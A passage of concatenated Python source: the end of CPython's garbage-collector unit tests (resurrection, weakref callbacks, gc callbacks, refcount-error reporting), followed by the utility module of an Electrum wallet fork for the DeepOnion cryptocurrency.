instance = Lazarus.resurrected_instances.pop()
self.assertTrue(hasattr(instance, "cargo"))
self.assertEqual(id(instance.cargo), cargo_id)
gc.collect()
gc.enable()
def test_resurrection_does_not_block_cleanup_of_other_objects(self):
# When a finalizer resurrects objects, stats were reporting them as
# having been collected. This affected both collect()'s return
# value and the dicts returned by get_stats().
N = 100
class A: # simple self-loop
def __init__(self):
self.me = self
class Z(A): # resurrecting __del__
def __del__(self):
zs.append(self)
zs = []
def getstats():
d = gc.get_stats()[-1]
return d['collected'], d['uncollectable']
gc.collect()
gc.disable()
# No problems if just collecting A() instances.
oldc, oldnc = getstats()
for i in range(N):
A()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N) # instance object & its dict
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# But Z() is not actually collected.
oldc, oldnc = c, nc
Z()
# Nothing is collected - Z() is merely resurrected.
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 0)
self.assertEqual(c - oldc, 0)
self.assertEqual(nc - oldnc, 0)
# Z() should not prevent anything else from being collected.
oldc, oldnc = c, nc
for i in range(N):
A()
Z()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N)
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# The A() trash should have been reclaimed already but the
# 2 copies of Z are still in zs (and the associated dicts).
oldc, oldnc = c, nc
zs.clear()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 4)
self.assertEqual(c - oldc, 4)
self.assertEqual(nc - oldnc, 0)
gc.enable()
@unittest.skipIf(ContainerNoGC is None,
'requires ContainerNoGC extension type')
def test_trash_weakref_clear(self):
# Test that trash weakrefs are properly cleared (bpo-38006).
#
# Structure we are creating:
#
# Z <- Y <- A--+--> WZ -> C
# ^ |
# +--+
# where:
# WZ is a weakref to Z with callback C
# Y doesn't implement tp_traverse
# A contains a reference to itself, Y and WZ
#
# A, Y, Z, WZ are all trash. The GC doesn't know that Z is trash
# because Y does not implement tp_traverse. To show the bug, WZ needs
# to live long enough so that Z is deallocated before it. Then, if
# gcmodule is buggy, when Z is being deallocated, C will run.
#
# To ensure WZ lives long enough, we put it in a second reference
# cycle. That trick only works due to the ordering of the GC prev/next
# linked lists. So, this test is a bit fragile.
#
# The bug reported in bpo-38006 is caused because the GC did not
# clear WZ before starting the process of calling tp_clear on the
# trash. Normally, handle_weakrefs() would find the weakref via Z and
# clear it. However, since the GC cannot find Z, WR is not cleared and
# it can execute during delete_garbage(). That can lead to disaster
# since the callback might tinker with objects that have already had
# tp_clear called on them (leaving them in possibly invalid states).
callback = unittest.mock.Mock()
class A:
__slots__ = ['a', 'y', 'wz']
class Z:
pass
# setup required object graph, as described above
a = A()
a.a = a
a.y = ContainerNoGC(Z())
a.wz = weakref.ref(a.y.value, callback)
# create second cycle to keep WZ alive longer
wr_cycle = [a.wz]
wr_cycle.append(wr_cycle)
# ensure trash unrelated to this test is gone
gc.collect()
gc.disable()
# release references and create trash
del a, wr_cycle
gc.collect()
# if called, it means there is a bug in the GC. The weakref should be
# cleared before Z dies.
callback.assert_not_called()
gc.enable()
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncollectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
@unittest.skipIf(BUILD_WITH_NDEBUG,
'built with -NDEBUG')
def test_refcount_errors(self):
self.preclean()
# Verify the "handling" of objects with broken refcounts
# Skip the test if ctypes is not available
import_module("ctypes")
import subprocess
code = textwrap.dedent('''
from test.support import gc_collect, SuppressCrashReport
a = [1, 2, 3]
b = [a]
# Avoid coredump when Py_FatalError() calls abort()
SuppressCrashReport().__enter__()
# Simulate the refcount of "a" being too low (compared to the
# references held on it by live data), but keeping it above zero
# (to avoid deallocating it):
import ctypes
ctypes.pythonapi.Py_DecRef(ctypes.py_object(a))
# The garbage collector should now have a fatal error
# when it reaches the broken object
gc_collect()
''')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
# Verify that stderr has a useful error message:
self.assertRegex(stderr,
br'gcmodule\.c:[0-9]+: gc_decref: Assertion "gc_get_refs\(g\) > 0" failed.')
self.assertRegex(stderr,
br'refcount is too small')
# "address : 0x7fb5062efc18"
# "address : 7FB5062EFC18"
address_regex = br'[0-9a-fA-Fx]+'
self.assertRegex(stderr,
br'object address : ' + address_regex)
self.assertRegex(stderr,
br'object refcount : 1')
self.assertRegex(stderr,
br'object type : ' + address_regex)
self.assertRegex(stderr,
br'object type name: list')
self.assertRegex(stderr,
br'object repr : \[1, 2, 3\]')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'ONION':8, 'mONION':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['ONION', 'mONION', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " ONION"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_deeponion.electrum_deeponion'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-deeponion'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-deeponion")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-ONION")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-ONION")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'explorer.deeponion.org': ('http://explorer.deeponion.org/',
{'tx': 'tx/', 'addr': 'address/'}),
'explorer2.deeponion.org': ('http://explorer.deeponion.org/',
{'tx': 'tx/', 'addr': 'address/'}),
'onionexplorer.youngwebsolutions.com': ('http://onionexplorer.youngwebsolutions.com:3001/',
{'tx': 'tx/', 'addr': 'address/'}),
'prohashing.com': ('https://prohashing.com/explorer/Deeponion',
{'tx': '/', 'addr': '/'}),
}
testnet_block_explorers = {
# 'explorer.deeponion.org': ('http://explorer.deeponion.org/',
# {'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'explorer.deeponion.org')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a DeepOnion address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'deeponion':
raise Exception("Not a deeponion URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid deeponion address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='deeponion', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
